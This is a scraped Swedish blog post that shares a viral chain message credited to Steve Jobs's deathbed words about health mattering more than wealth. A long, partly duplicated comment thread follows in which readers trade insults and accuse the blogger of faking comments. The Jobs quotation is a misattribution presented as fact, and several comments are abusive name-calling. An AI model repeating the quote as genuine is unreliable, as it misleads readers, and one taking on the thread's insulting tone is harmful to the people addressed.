Mys Blommor / Din florist / Interflora 🌹 / Högsta Kvalitet & Design💫 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

Mys Blommor🌹/ Din florist / Högsta Kvalitet & Design💫 / 🌍 Catalina Torget 15 Täby 📲 08 36 36 14

@mymartens

@mys_blommor

Strong Mamas

Lyckligare som miljardär? Vad som verkligen betyder något….

79CD8BFD-CBB0-434E-A148-174A1EC88286

Hej igen!

Såg denna på facebook, och ville dela den med er 🙏🏻

En reminder om vad som VERKLIGEN betyder något….

-Något värt att dela !!!

Steve Jobs dog som miljardär, med en förmögenhet på 7 miljarder dollar, vid en ålder av 56 år av cancer i bukspottkörteln, och här är några av hans sista ord … 👇👇👇

”I andras ögon är mitt liv essensen av framgång, men bortsett från jobbet hade jag lite glädje. Och till slut är rikedom bara det som jag är van vid. ”

”I det här ögonblicket, när jag ligger på sängen, sjuk och minns hela mitt liv, inser jag att all min framgång och rikedom som jag har är meningslös inför den överhängande döden.
Du kan hyra någon för att köra bil åt dig, tjäna pengar åt dig – men du kan inte hyra någon för att bära sjukdomen åt dig. Man kan hitta materiella saker, men det finns en sak som inte kan hittas när det går förlorat – ”LIVET”. ❤️

Skäm bort dig själv och uppskatta andra. När vi blir äldre är vi smartare, och vi inser långsamt att klockan som kostar 300 eller 3000 båda visar samma tid.
Oavsett om vi har en plånbok som kostar 300 eller 3000 – mängden pengar i plånboken är desamma.
Oavsett om vi kör en bil till ett värde av 150.000 eller en bil värd 1.500.000 – vägen och avståndet är samma, och vi når samma destination.
Om huset vi bor i är 300 kvadratmeter, eller 3000 kvadratmeter – är ensamheten densamma. ”

”Din verkliga inre lycka kommer inte från de materiella sakerna i denna värld. 🌍 Oavsett om du flyger första klass eller ekonomiklass – om planet kraschar, kraschar du med det. ”

Så jag hoppas att du förstår att när du har vänner eller någon att prata med – det är sann lycka! ✅

💥 Fem obestridliga fakta 💥

1️⃣ Utbilda inte dina barn att vara rika. Utbilda dem att vara lyckliga.

2️⃣ Ät din mat som medicin, annars måste du äta din medicin som mat.

3️⃣ Den som älskar dig kommer aldrig att lämna dig, även om han har 100 skäl att ge upp. Han kommer alltid att hitta en anledning att hålla fast vid vänskapen.

4️⃣ Det är en stor skillnad mellan att vara människa och människa.

5️⃣ Om du vill gå snabbt – gå ensam! Men om du vill gå långt – gå tillsammans.

Och avslutningsvis … 👇

De sex bästa läkarna i världen
1️⃣ Solljus
2️⃣ Vila
3️⃣ Träning
4️⃣ Kost
5️⃣ Självförtroende
6️⃣ Vänner

Håll ovanstående råd i alla livets faser och njut av ett hälsosamt liv.

Skatt, kärlek till din familj, kärlek till din make, kärlek till dina vänner …

Skäm bort dig själv. Uppskatta andra.

”Älska de människor som Gud skickade dig, en dag kommer han att behöva dem tillbaka.”

Det är därför det är så viktigt att fokusera på din hälsa snarare än på din rikedom, eftersom hälsa är den verkliga rikedomen……. 🙏🏻

 

-Amen på det 👆🏻

B49C6E84-E113-46FC-B8E2-2840EDAB3C75
Min skatt, min kärlek och min mening är Lilleman❤️ Snaaaart, snart börjar vi ett nytt kapitel 🙏🏻
/  My Martens

118 Komentarer

 1. Mycket kärlek i bilden på dig o Lilleman?
  Kloka tankar av Steve Jobs. I praktiken vet man vad som är viktigt i livet. Ändå så är det svårt att vara sitt perfekta jag. Äta rätt, motionera, säga ofta att man älskar de sina. Berätta för sina vänner vad de betyder.
  Kraven kan kännas tuffa ibland i dagens samhälle. Jag tänker om jag är mitt bästa jag då och då, det får räcka så. Jag har då hunnit en bra bit fram i livet.
  Tänker på våra ungdommar som har tuffa krav på sig från många håll. Ska skaffa bra utbildning, resa vara mån om sitt yttre. De har inte hunnit landa och inse att de duger bra som de är och ingen är perfekt. Lätt att skaffa sig en bild att alla andra är perfekta och lyckliga hela tiden. För de flesta går nog livet upp och ner. Har man haft motgångar så uppskatter man de ljusare stunderna bättre.

 2. Mycket kärlek i bilden på dig o Lilleman💕
  Kloka tankar av Steve Jobs. I praktiken vet man vad som är viktigt i livet. Ändå så är det svårt att vara sitt perfekta jag. Äta rätt, motionera, säga ofta att man älskar de sina. Berätta för sina vänner vad de betyder.
  Kraven kan kännas tuffa ibland i dagens samhälle. Jag tänker om jag är mitt bästa jag då och då, det får räcka så. Jag har då hunnit en bra bit fram i livet.
  Tänker på våra ungdommar som har tuffa krav på sig från många håll. Ska skaffa bra utbildning, resa vara mån om sitt yttre. De har inte hunnit landa och inse att de duger bra som de är och ingen är perfekt. Lätt att skaffa sig en bild att alla andra är perfekta och lyckliga hela tiden. För de flesta går nog livet upp och ner. Har man haft motgångar så uppskatter man de ljusare stunderna bättre.

 3. My, har du tidsinställda blogginlägg nu också? För du skrev i inlägget innan att du checkar ut för i kväll för du skulle umgås med Jonas.

 4. My, har du tidsinställda blogginlägg nu också? För du skrev i inlägget innan att du checkar ut för i kväll för du skulle umgås med Jonas.

 5. Har man lite kunskaper om datorer, nätverk och skript så är det lätt att kolla upp kommentarernas IP ?
  En IP är alltid offentlig men ägaren lämnas inte ut, men däremot så ser man att många här skriver under samma. Även fast man skiftar mellan Wi-Fi och mobilt så är det flera alias.
  Jag fattar att en bloggare vill dra mer läsare, antingen genom att fånga läsaren med texter som sticker ut eller att skriva provocerande inlägg. Folk älskar intriger – men att kalla folk för dum i huvudet, svagbegåvad osv för att få sälja mer är väl ändå att gå över en gräns?!
  När man t.o.m skriver ett nytt inlägg och forsätter att fylla på det hetsiga kommentarsfältet i ett annat inlägg och sen påminner om att det var något som skulle tas upp i bloggen och som bara utlovas för att spänningen ska växa är lågt.

  • Håller också med något märkligt är det härinne med dessa intriger som kommer efter en period med väldigt få eller helt tomt bland kommentarerna och ingen tillrättavisning what so ever av bloggaren utan bara ett nytt inlägg som om inget har hänt. Ja nu var det vad dom hände på båten vi skulle få höra men ännu inte gjort en liten cliffhanger m.a.o.

 6. Kan det vara så att den mycket dåligt photoshoppade bilden var planerad och att den skulle skapa många kommentarer och intriger = pengar.
  Om så är fallet är detta riktigt sjukt ?

 7. Har man lite kunskaper om datorer, nätverk och skript så är det lätt att kolla upp kommentarernas IP 😂

  En IP är alltid offentlig men ägaren lämnas inte ut, men däremot så ser man att många här skriver under samma. Även fast man skiftar mellan Wi-Fi och mobilt så är det flera alias.

  Jag fattar att en bloggare vill dra mer läsare, antingen genom att fånga läsaren med texter som sticker ut eller att skriva provocerande inlägg. Folk älskar intriger – men att kalla folk för dum i huvudet, svagbegåvad osv för att få sälja mer är väl ändå att gå över en gräns?!

  När man t.o.m skriver ett nytt inlägg och forsätter att fylla på det hetsiga kommentarsfältet i ett annat inlägg och sen påminner om att det var något som skulle tas upp i bloggen och som bara utlovas för att spänningen ska växa är lågt.

  • Håller också med något märkligt är det härinne med dessa intriger som kommer efter en period med väldigt få eller helt tomt bland kommentarerna och ingen tillrättavisning what so ever av bloggaren utan bara ett nytt inlägg som om inget har hänt. Ja nu var det vad dom hände på båten vi skulle få höra men ännu inte gjort en liten cliffhanger m.a.o.

 8. Gick in igår under ett förnamn för att kolla och som inte använts på länge och fick då till svar ”är du här med ditt nygamla nick och kräver bla bla och sedan snark snark” Min dotter och jag har båda kommenterat här, är det förbjudet. Men hon vågar inte gå in här längre. Vi har aldrig klagat på dig förrän igår då jag medvetet ville se vad MoaMy svarade…
  Så då vet man att någon jobbar med att trycka ner och spotta på folk som kommenterar och tycker saker som My inte gillar.
  Jag börjar förstå andra ” kändisar” som dragit sig undan My och om man har en blogg som inkomst kanske man ska passa sig…hoppas att många fler slutar gå in här.
  Trassla vidare My med ditt röriga liv, din falskhet och dina löjliga ”berättar sedan” och får jag se att du outar mig eller min dotter blir du polisanmäld.

  • Hej My här, jag har inte svarat dig? Och vet inte heller vad du pratar om….. Otrevligt kommentar, på gränsen till obehaglig. Gör det enkelt för dig själv, och sluta läs min blogg om du ändå inte gillar den =) Det måste ju spara dig både tid och energi =) Med vänlig hälsning, / My Martens

  • Malm
   Hahaha… Jag Döööör…
   Malm: Hej polisen!
   Jag är såååå upprörd…
   En bloggare tänker, kanske outa mig och min dotter.. Tror jag…
   Polisen: Tror? Kanske? Tänker?
   Malm: Ja… När jag och min dotter läste bloggen så sa någon annan läsare att jag var ” dum i huvvet”.
   Polisen: Låste du inte bara, sa du?
   Malm: Jo, ja.
   Polisen: Och då skrev någon random person att du var dum?
   Malm: Precis!
   Polisen: Sa du inte nyss att du bara läste? Hur var ” dum i huvvet” riktat mot dig och dottern då?
   Malm: Men jag skrev ju bara vad jag tyckte. Min rättighet ju!
   Polisen: Jaha… Vad skrev du då?
   Malm: Inget särskilt bara vad jag tyckte.
   Polisen; Vad tyckte du då.,.
   Malm: Att bloggaren var tjock, fet, ful, dålig mamma… Bara som jag tycker…
   Polisen: Okej… Ett tips! Sluta läs! Du är dum i huvvet, riktigt dum i huvvet! Hej då! Nästa!
   ???????????
   Låt inte Malm finnas på riktigt!
   //Moa

   • Har aldrig skrivit så som du lagt ut…aldrig har sagt så…Hur sjukt är detta, är Någon full eller mentalt galen…sista från oss
    Hahaha lycka till med sonen i en etta till lya, kram

 9. Helt otroligt om det är så att bloggaren låtsas vara någon annan och går in och kommenterar under falskt flagg.
  OM det är så, bevisligen, så blir jag inte förvånad- inte det minsta.

  • Men kära hjärtanenes…. Det är inte fysiskt möjligt, då varje iPR nr är individuellt. Jag skulle stå som admin =) Iallafalla via denna portalen… Så det behöver du inte oroa dig för =) Plus att jag me ditt schema är inloggade korta stunder då och då =) För att hinna med. Så tyvärr läser jag inte ens alla kommentarer nu när det varit kaos här inne! Men försöker då och då att fånga upp de ”vanliga” kommentarerna som tyvärr hamnat i kläm mellan Moa, Malin och gav vet avd dom kallar sig för idag =)

 10. Kopierat el ej, så var väl ändå tanken GOD! Å det är det som har betydelse. Alla ni som klagar, varför? För oavsett vad My skriver, visar bilder etc, så finns ni där…… dock ej alla. Hon har ganska nyligen bytt jobb o flytten med Ludwig är mycket att fixa. Ge henne tid att andas lite emellanåt, tack❤️ så hinner ni oxå andas o tänker lite klarare.
  All kärlek till dig My❤️

 11. Varför svarar du aldrig direkt till originalmoa då?
  Du låter henne hållas och förpesta hela kommentarsfältet gång efter gång.
  Du vill ju ha klick och turbulens verkar det som om du inte gör något. Nu gör Moa detta i inlägg efter inlägg och det med ditt goda minne uppenbarligen.

  • Undrar jag också över du svarar ju flera gånger här och snabbt, på absolut inte elaka kommentarer men varför har du inte bemött denna Moa en endaste gång som skriver så fruktansvärda saker. Är det verkligen för att fler och fler känner att de måste svara för att försvara sig själv och det ger klick som skrivs här?? i sådana fall är det ju jättesorgligt.

   • Det har jag ju gjort jätte många gånger =) Men det är nog en del av mitt sätt att ”skydda mig” från näthat och skriverier som dessa att inte ens gå in och läsa….. Klick i kommentarerna ger ingenting annat än ren och skär huvudvärk =) Bara så att du vet.. Med vänlig hälsning, My Martens

   • Mira
    Menar du på fullt allvar att My ska försvara dem som är allra, allra elakast mot henne själv mot någon som försvarar henne?
    Nots bene! Jag har aldrig skrivit ett ont ord om My, hennes inlägg, hennes samarbete, sonen eller särbo. Inte heller ett ont ord till någon av de som är här av rätt skäl.
    De enda som får skit är de som bara kritiserar, bråkar, ljuger och pp:ar My/val/utseende. Ni förtjänar det, alla dagar i veckan.
    Nu tycker ni det är rimligt att hon försvarar er?
    Nä, men nä! Ni kan inte vara på riktigt!
    Förklara djupare hur du tänker, om du nu har gjort det öht.
    //Moa

 12. Kan det vara så att den mycket dåligt photoshoppade bilden var planerad och att den skulle skapa många kommentarer och intriger = pengar.
  Om så är fallet är detta riktigt sjukt 😔

 13. Gick in igår under ett förnamn för att kolla och som inte använts på länge och fick då till svar ”är du här med ditt nygamla nick och kräver bla bla och sedan snark snark” Min dotter och jag har båda kommenterat här, är det förbjudet. Men hon vågar inte gå in här längre. Vi har aldrig klagat på dig förrän igår då jag medvetet ville se vad MoaMy svarade…
  Så då vet man att någon jobbar med att trycka ner och spotta på folk som kommenterar och tycker saker som My inte gillar.
  Jag börjar förstå andra ” kändisar” som dragit sig undan My och om man har en blogg som inkomst kanske man ska passa sig…hoppas att många fler slutar gå in här.
  Trassla vidare My med ditt röriga liv, din falskhet och dina löjliga ”berättar sedan” och får jag se att du outar mig eller min dotter blir du polisanmäld.

  • Hej My här, jag har inte svarat dig? Och vet inte heller vad du pratar om….. Otrevligt kommentar, på gränsen till obehaglig. Gör det enkelt för dig själv, och sluta läs min blogg om du ändå inte gillar den =) Det måste ju spara dig både tid och energi =) Med vänlig hälsning, / My Martens

  • Malm

   Hahaha… Jag Döööör…

   Malm: Hej polisen!

   Jag är såååå upprörd…

   En bloggare tänker, kanske outa mig och min dotter.. Tror jag…

   Polisen: Tror? Kanske? Tänker?

   Malm: Ja… När jag och min dotter läste bloggen så sa någon annan läsare att jag var ” dum i huvvet”.

   Polisen: Låste du inte bara, sa du?

   Malm: Jo, ja.

   Polisen: Och då skrev någon random person att du var dum?

   Malm: Precis!

   Polisen: Sa du inte nyss att du bara läste? Hur var ” dum i huvvet” riktat mot dig och dottern då?

   Malm: Men jag skrev ju bara vad jag tyckte. Min rättighet ju!

   Polisen: Jaha… Vad skrev du då?

   Malm: Inget särskilt bara vad jag tyckte.

   Polisen; Vad tyckte du då.,.

   Malm: Att bloggaren var tjock, fet, ful, dålig mamma… Bara som jag tycker…

   Polisen: Okej… Ett tips! Sluta läs! Du är dum i huvvet, riktigt dum i huvvet! Hej då! Nästa!

   🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣🤣

   Låt inte Malm finnas på riktigt!

   //Moa

   • Har aldrig skrivit så som du lagt ut…aldrig har sagt så…Hur sjukt är detta, är Någon full eller mentalt galen…sista från oss
    Hahaha lycka till med sonen i en etta till lya, kram

 14. Helt otroligt om det är så att bloggaren låtsas vara någon annan och går in och kommenterar under falskt flagg.
  OM det är så, bevisligen, så blir jag inte förvånad- inte det minsta.

  • Men kära hjärtanenes…. Det är inte fysiskt möjligt, då varje iPR nr är individuellt. Jag skulle stå som admin =) Iallafalla via denna portalen… Så det behöver du inte oroa dig för =) Plus att jag me ditt schema är inloggade korta stunder då och då =) För att hinna med. Så tyvärr läser jag inte ens alla kommentarer nu när det varit kaos här inne! Men försöker då och då att fånga upp de ”vanliga” kommentarerna som tyvärr hamnat i kläm mellan Moa, Malin och gav vet avd dom kallar sig för idag =)

 15. Men är det inte jobbigt att klänga sig fast vid samma tuggande hela tiden här bland kommentarerna? I inlägg efter inlägg. Samma frågor. Samma ifrågasättande. Samma klagolåt. Den lilla svansen som bara måste förpesta här med sina unkna påståenden om än det ena och än det andra. Herregud, släpp gnället och gå vidare!

 16. Har öht inte varit inne på Mys blogg på 18-20 h.
  Verkligen trevlig och mysig stämning här när jag håller mig borta… Verkligen! ?
  Mystanterna firar julafton och grinar över inbillad kränkthet. ?????? Yeeey…
  Är det ens möjligt att tycka att man själv är vettig efter dessa inlägg?
  Steve Jobs citat är bortom dessa neandertalares räddning.
  Pärlor för svin. ???
  Fö signeras mina inlägg //Moa, inget annat!
  //Moa

  • Moa!
   Jag förstår om du inte var här på några timmar så hårt som du jobbade igår.
   Och till My!
   Du svarar gärna personligt till flera personer för småsaker, men om du vill ha stopp på skitsnacket här får du nog svara direkt till Moa…hon verkar inte förstå att du inte vill ha hennes hjälp. Om du nu menar det du säger i svaret ovan.

   • När/var/hur har My, personligen bett mig sluta skriva? Lika lite som hon bett dig skriva personligen.
    IQ-fiskmås personifierad! ??? Stay in school, kids!
    Teflonhjärnan Tian! ????
    Aja… Här sitter du och är elak medan ditt liv passerar. Inte konstigt Sverige går mot lågkonjunktur.
    //Moa

    • Detta skrev My igår!
     ”Men kära hjärtanenes…. Det är inte fysiskt möjligt, då varje iPR nr är individuellt. Jag skulle stå som admin =) Iallafalla via denna portalen… Så det behöver du inte oroa dig för =) Plus att jag me ditt schema är inloggade korta stunder då och då =) För att hinna med. Så tyvärr läser jag inte ens alla kommentarer nu när det varit kaos här inne! Men försöker då och då att fånga upp de ”vanliga” kommentarerna som tyvärr hamnat i kläm mellan Moa, Malin och gav vet avd dom kallar sig för idag =)”
     Räcker det för dig som bevis?
     Du är rätt otrevlig i dina kommentarer, men du kan väl inte bättre din stackare.

     • Är du lika renons på resten av ditt liv så förstår jag att du inte vill leva det och hänger här och grinar ist.
      Det gäller dig/dig/dig och även dig St. Du har ju många nick.
      Bl a Moa… Så.. joå..,ss att..
      Eftersom jag är nååågot mer rak och oblyg så har My fått min mail. Hon kan när hon vill hörs av sig och be mig sluta skriva på hennes blogg.
      Hon bet er med många nick och mobbingtendensenser sluta. Varför gör ni inte bara det.
      Verkar ju både rimligt och troligt att hon hellre har någon som försvarar henne här än någon som slänger skit/hittar på och ljuger om allt som handlar om henne. Eller vad tror du själv din lilla nolla?
      Sluta älta om IP:n polisen är de enda som har glädje av dem. Gäller faktiskt VPN också.
      Seså spring och lek med de andra nicken nu och låt oss vuxna vara ifred! ?????????????
      //Moa

     • Lite till!
      Tian 24 oktober, 2019 on 12:48Svara
      Varför svarar du aldrig direkt till originalmoa då?
      Du låter henne hållas och förpesta hela kommentarsfältet gång efter gång.
      Du vill ju ha klick och turbulens verkar det som om du inte gör något. Nu gör Moa detta i inlägg efter inlägg och det med ditt goda minne uppenbarligen.
      Mira 24 oktober, 2019 on 12:57Svara
      Undrar jag också över du svarar ju flera gånger här och snabbt, på absolut inte elaka kommentarer men varför har du inte bemött denna Moa en endaste gång som skriver så fruktansvärda saker. Är det verkligen för att fler och fler känner att de måste svara för att försvara sig själv och det ger klick som skrivs här?? i sådana fall är det ju jättesorgligt.
      My 24 oktober, 2019 on 13:43Svara
      Det har jag ju gjort jätte många gånger=) Men det är nog en del av mitt sätt att ”skydda mig” från näthat och skriverier som dessa att inte ens gå in och läsa….. Klick i kommentarerna ger ingenting annat än ren och skär huvudvärk =) Bara så
      Hon säger här att hon har sagt till dig jättemånga gånger!

     • Tian
      Du läser som du har förstånd till.
      Tror sällan jag stött på någon så tondöv som dig.
      Du spelar så falskt att varenda person i din närhet måste lida av grav tinnitus.
      Hur du har oförmåga att tolka text har ingen förankring i verkligheten.
      Men å andra sidan, vem bryr sig om vad du tror du fattat? ?????
      Du kan väl sluta skriva. Då slipper du mig. Verkar enklast så.
      //Moa

     • Du har tydligen svårt med läsförståelse, det står om dig Moa.
      Jag slutar skriva om och när jag vill, det lär knappast du bestämma?

     • Nej, du vill att det gör det! Skillnad bejbi…
      ?????
      Vet du vad ett självmål är Tian?
      Det är när motståndarlaget slår in bollen/pucken i egen ”kapsel”.
      Du gjorde just ett. ??????
      Jag har aldrig sagt att du måste sluta läsa. Jag sa, som förslag på dina inbillade problem att du kunde sluta läsa.
      Då, bevisar du att jag har rätt i att du har stora problem med läsförståelsen…. ???
      Det är så galet så det snudd på är gölligt! ???
      //Moa

 17. Kopierat el ej, så var väl ändå tanken GOD! Å det är det som har betydelse. Alla ni som klagar, varför? För oavsett vad My skriver, visar bilder etc, så finns ni där…… dock ej alla. Hon har ganska nyligen bytt jobb o flytten med Ludwig är mycket att fixa. Ge henne tid att andas lite emellanåt, tack❤️ så hinner ni oxå andas o tänker lite klarare.
  All kärlek till dig My❤️

 18. Varför svarar du aldrig direkt till originalmoa då?
  Du låter henne hållas och förpesta hela kommentarsfältet gång efter gång.

  Du vill ju ha klick och turbulens verkar det som om du inte gör något. Nu gör Moa detta i inlägg efter inlägg och det med ditt goda minne uppenbarligen.

  • Undrar jag också över du svarar ju flera gånger här och snabbt, på absolut inte elaka kommentarer men varför har du inte bemött denna Moa en endaste gång som skriver så fruktansvärda saker. Är det verkligen för att fler och fler känner att de måste svara för att försvara sig själv och det ger klick som skrivs här?? i sådana fall är det ju jättesorgligt.

   • Det har jag ju gjort jätte många gånger =) Men det är nog en del av mitt sätt att ”skydda mig” från näthat och skriverier som dessa att inte ens gå in och läsa….. Klick i kommentarerna ger ingenting annat än ren och skär huvudvärk =) Bara så att du vet.. Med vänlig hälsning, My Martens

   • Mira

    Menar du på fullt allvar att My ska försvara dem som är allra, allra elakast mot henne själv mot någon som försvarar henne?

    Nots bene! Jag har aldrig skrivit ett ont ord om My, hennes inlägg, hennes samarbete, sonen eller särbo. Inte heller ett ont ord till någon av de som är här av rätt skäl.

    De enda som får skit är de som bara kritiserar, bråkar, ljuger och pp:ar My/val/utseende. Ni förtjänar det, alla dagar i veckan.

    Nu tycker ni det är rimligt att hon försvarar er?

    Nä, men nä! Ni kan inte vara på riktigt!

    Förklara djupare hur du tänker, om du nu har gjort det öht.

    //Moa

 19. Men är det inte jobbigt att klänga sig fast vid samma tuggande hela tiden här bland kommentarerna? I inlägg efter inlägg. Samma frågor. Samma ifrågasättande. Samma klagolåt. Den lilla svansen som bara måste förpesta här med sina unkna påståenden om än det ena och än det andra. Herregud, släpp gnället och gå vidare!

 20. Har öht inte varit inne på Mys blogg på 18-20 h.

  Verkligen trevlig och mysig stämning här när jag håller mig borta… Verkligen! 🤣

  Mystanterna firar julafton och grinar över inbillad kränkthet. 👍🏽👍🏽👍🏽 Yeeey…

  Är det ens möjligt att tycka att man själv är vettig efter dessa inlägg?

  Steve Jobs citat är bortom dessa neandertalares räddning.
  Pärlor för svin. 😴😴😴

  Fö signeras mina inlägg //Moa, inget annat!

  //Moa

  • Moa!
   Jag förstår om du inte var här på några timmar så hårt som du jobbade igår.

   Och till My!
   Du svarar gärna personligt till flera personer för småsaker, men om du vill ha stopp på skitsnacket här får du nog svara direkt till Moa…hon verkar inte förstå att du inte vill ha hennes hjälp. Om du nu menar det du säger i svaret ovan.

   • När/var/hur har My, personligen bett mig sluta skriva? Lika lite som hon bett dig skriva personligen.

    IQ-fiskmås personifierad! 🤣🤣🤣 Stay in school, kids!

    Teflonhjärnan Tian! 👍🏽🤣🤣

    Aja… Här sitter du och är elak medan ditt liv passerar. Inte konstigt Sverige går mot lågkonjunktur.

    //Moa

    • Detta skrev My igår!

     ”Men kära hjärtanenes…. Det är inte fysiskt möjligt, då varje iPR nr är individuellt. Jag skulle stå som admin =) Iallafalla via denna portalen… Så det behöver du inte oroa dig för =) Plus att jag me ditt schema är inloggade korta stunder då och då =) För att hinna med. Så tyvärr läser jag inte ens alla kommentarer nu när det varit kaos här inne! Men försöker då och då att fånga upp de ”vanliga” kommentarerna som tyvärr hamnat i kläm mellan Moa, Malin och gav vet avd dom kallar sig för idag =)”

     Räcker det för dig som bevis?
     Du är rätt otrevlig i dina kommentarer, men du kan väl inte bättre din stackare.

     • Är du lika renons på resten av ditt liv så förstår jag att du inte vill leva det och hänger här och grinar ist.

      Det gäller dig/dig/dig och även dig St. Du har ju många nick.
      Bl a Moa… Så.. joå..,ss att..

      Eftersom jag är nååågot mer rak och oblyg så har My fått min mail. Hon kan när hon vill hörs av sig och be mig sluta skriva på hennes blogg.

      Hon bet er med många nick och mobbingtendensenser sluta. Varför gör ni inte bara det.

      Verkar ju både rimligt och troligt att hon hellre har någon som försvarar henne här än någon som slänger skit/hittar på och ljuger om allt som handlar om henne. Eller vad tror du själv din lilla nolla?

      Sluta älta om IP:n polisen är de enda som har glädje av dem. Gäller faktiskt VPN också.

      Seså spring och lek med de andra nicken nu och låt oss vuxna vara ifred! 😴😘😴😘🤣🤣🤣🥳💪🏽👊🍾👿

      //Moa

     • Lite till!
      Tian 24 oktober, 2019 on 12:48Svara

      Varför svarar du aldrig direkt till originalmoa då?
      Du låter henne hållas och förpesta hela kommentarsfältet gång efter gång.

      Du vill ju ha klick och turbulens verkar det som om du inte gör något. Nu gör Moa detta i inlägg efter inlägg och det med ditt goda minne uppenbarligen.

      Mira 24 oktober, 2019 on 12:57Svara

      Undrar jag också över du svarar ju flera gånger här och snabbt, på absolut inte elaka kommentarer men varför har du inte bemött denna Moa en endaste gång som skriver så fruktansvärda saker. Är det verkligen för att fler och fler känner att de måste svara för att försvara sig själv och det ger klick som skrivs här?? i sådana fall är det ju jättesorgligt.

      My 24 oktober, 2019 on 13:43Svara

      Det har jag ju gjort jätte många gånger=) Men det är nog en del av mitt sätt att ”skydda mig” från näthat och skriverier som dessa att inte ens gå in och läsa….. Klick i kommentarerna ger ingenting annat än ren och skär huvudvärk =) Bara så

      Hon säger här att hon har sagt till dig jättemånga gånger!

     • Tian

      Du läser som du har förstånd till.

      Tror sällan jag stött på någon så tondöv som dig.

      Du spelar så falskt att varenda person i din närhet måste lida av grav tinnitus.

      Hur du har oförmåga att tolka text har ingen förankring i verkligheten.

      Men å andra sidan, vem bryr sig om vad du tror du fattat? 😴😴😴😴😴

      Du kan väl sluta skriva. Då slipper du mig. Verkar enklast så.

      //Moa

     • Du har tydligen svårt med läsförståelse, det står om dig Moa.

      Jag slutar skriva om och när jag vill, det lär knappast du bestämma😁

     • Nej, du vill att det gör det! Skillnad bejbi…

      🤣🤣🤣🤣🤣

      Vet du vad ett självmål är Tian?

      Det är när motståndarlaget slår in bollen/pucken i egen ”kapsel”.

      Du gjorde just ett. 🤣🤣👊👊🤣🤣

      Jag har aldrig sagt att du måste sluta läsa. Jag sa, som förslag på dina inbillade problem att du kunde sluta läsa.

      Då, bevisar du att jag har rätt i att du har stora problem med läsförståelsen…. 🤣🤣🤣

      Det är så galet så det snudd på är gölligt! 😘😘😘

      //Moa

 21. Det är verkligen tragiskt att de som gnäller på Moa, det är de personer som inte fattar att det är de själva som förpestar kommentarsfältet. Med sitt evinnerliga gnäll, nedtryckande synpunkter och allmänt skitsnack osv osv. Nu när det äntligen är nån som vettigt argumenterar med/mot dem, då bli det plötsligt jobbigt och man tycker att Moa skriver fruktansvärda saker ? Mycket märkligt! Noll självrannsakan….

 22. Det är verkligen tragiskt att de som gnäller på Moa, det är de personer som inte fattar att det är de själva som förpestar kommentarsfältet. Med sitt evinnerliga gnäll, nedtryckande synpunkter och allmänt skitsnack osv osv. Nu när det äntligen är nån som vettigt argumenterar med/mot dem, då bli det plötsligt jobbigt och man tycker att Moa skriver fruktansvärda saker 😳 Mycket märkligt! Noll självrannsakan….

 23. Skrämmande vad folk kan sitta och hata bakom en skärm . Skulle vara intressant att se hur mycket som skulle bli sagt i verkligheten om ni stod mitt emot My eller någon annan bloggare . Tack för en bra blogg?

  • Inga problem alls med det faktiskt har sagt det skulle vara mer än intressant att möta denna Moa som dessutom vet vem jag är säger hon, men hon kommer med ursäkter hela tiden dessvärre. (Åsikter och tankar är inte heller detsamma som hat.)

   • Mollan
    Din dumme fan!
    Nej, jag har inte kommit med en ursäkt öht! Sluta bara ljug!
    Jag ödslar ingen tid på att träffa dig. Nästa gång vi ses går jag fram till dig och så tar vi en diskussion där och då!
    Något annat har jag öht aldrig sagt. Så försök inte!
    Du är ointressant, vi är och kommer inte bli vänner. Och jag känner inget behov av att behöva lyssna på ditt tjatiga, elaka ältande. Jag ska bara säga dig, rakt i synen, vad jag anser om beteenden som ditt. Just för att du ska förstå att jag inte skäms ett dugg för varken mig själv, min åsikt eller ståndpunkt.
    Hahaha.. Kanske skriver jag ut dina värsta påhopp på My och läser upp högt och tydligt så det uppmärksammas av andra… För di står ju upp för dig själv, ditt beteende och dina rättigheter att få kräkas elakheter på andra. ???
    Aja.. Det blir nog bra!
    //Moa

 24. Skrämmande vad folk kan sitta och hata bakom en skärm . Skulle vara intressant att se hur mycket som skulle bli sagt i verkligheten om ni stod mitt emot My eller någon annan bloggare . Tack för en bra blogg🧡

  • Inga problem alls med det faktiskt har sagt det skulle vara mer än intressant att möta denna Moa som dessutom vet vem jag är säger hon, men hon kommer med ursäkter hela tiden dessvärre. (Åsikter och tankar är inte heller detsamma som hat.)

   • Mollan

    Din dumme fan!

    Nej, jag har inte kommit med en ursäkt öht! Sluta bara ljug!

    Jag ödslar ingen tid på att träffa dig. Nästa gång vi ses går jag fram till dig och så tar vi en diskussion där och då!

    Något annat har jag öht aldrig sagt. Så försök inte!

    Du är ointressant, vi är och kommer inte bli vänner. Och jag känner inget behov av att behöva lyssna på ditt tjatiga, elaka ältande. Jag ska bara säga dig, rakt i synen, vad jag anser om beteenden som ditt. Just för att du ska förstå att jag inte skäms ett dugg för varken mig själv, min åsikt eller ståndpunkt.

    Hahaha.. Kanske skriver jag ut dina värsta påhopp på My och läser upp högt och tydligt så det uppmärksammas av andra… För di står ju upp för dig själv, ditt beteende och dina rättigheter att få kräkas elakheter på andra. 🤣👊🤣

    Aja.. Det blir nog bra!

    //Moa

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

